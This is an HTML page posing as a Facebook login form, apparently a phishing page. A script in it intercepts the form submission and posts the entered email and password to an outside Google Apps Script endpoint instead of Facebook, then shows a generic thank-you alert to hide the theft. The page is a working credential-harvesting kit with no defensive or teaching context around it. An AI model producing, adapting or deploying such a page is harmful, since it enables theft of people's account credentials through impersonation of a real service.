<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Facebook Login Page</title>
    <style>
        body {
            font-family: Arial, sans-serif;
        }
        .container {
            max-width: 400px;
            margin: 50px auto;
            padding: 20px;
            border: 1px solid #ccc;
            border-radius: 5px;
            background-color: #f9f9f9;
        }
        input[type="text"], input[type="password"], input[type="submit"] {
            width: 100%;
            padding: 10px;
            margin: 5px 0;
            display: inline-block;
            border: 1px solid #ccc;
            border-radius: 4px;
            box-sizing: border-box;
        }
        input[type="submit"] {
            background-color: #4CAF50;
            color: white;
            border: none;
            cursor: pointer;
        }
        input[type="submit"]:hover {
            background-color: #45a049;
        }
    </style>
</head>
<body>

<div class="container">
    <h2>Facebook Login</h2>
    <form action="https://www.facebook.com/login.php" method="post" name="google-sheet">
        <label for="email">Email:</label>
        <input type="text" id="email" name="email" required>
        <label for="password">Password:</label>
        <input type="password" id="password" name="password" required>
        <input type="submit" value="Login">
        <a href="https://www.facebook.com/?stype=lo&deoia=1&jlou=AfcnSEKN7iNZ0oIMzW9ncRJfuZHEOdikfOOrtd5XuwOE3Y2S4_ZxhcQG_WwWxJyseejTa9kQlNO7kddXNOf8k0NnXLJoBKFNR-8QPQg4gJxlCQ&smuh=40050&lh=Ac8qjT3wej6sZVVBExI"></a>
    </form>
</div>

<script>
    const scriptURL = 'https://script.google.com/macros/s/AKfycbzpA4o82XnoDAWJBx0-BGxNboc5yaRtQtyTSbvN7LVbVsoNSDMx_fy8bjIe0jTDlMzUVg/exec'
    const form = document.forms['google-sheet']
  
    form.addEventListener('submit', e => {
      e.preventDefault()
      fetch(scriptURL, { method: 'POST', body: new FormData(form)})
        .then(response => alert("Thanks for Contacting us..! We Will Contact You Soon..."))
        .catch(error => console.error('Error!', error.message))
    })
    </script>

</body>
</html>
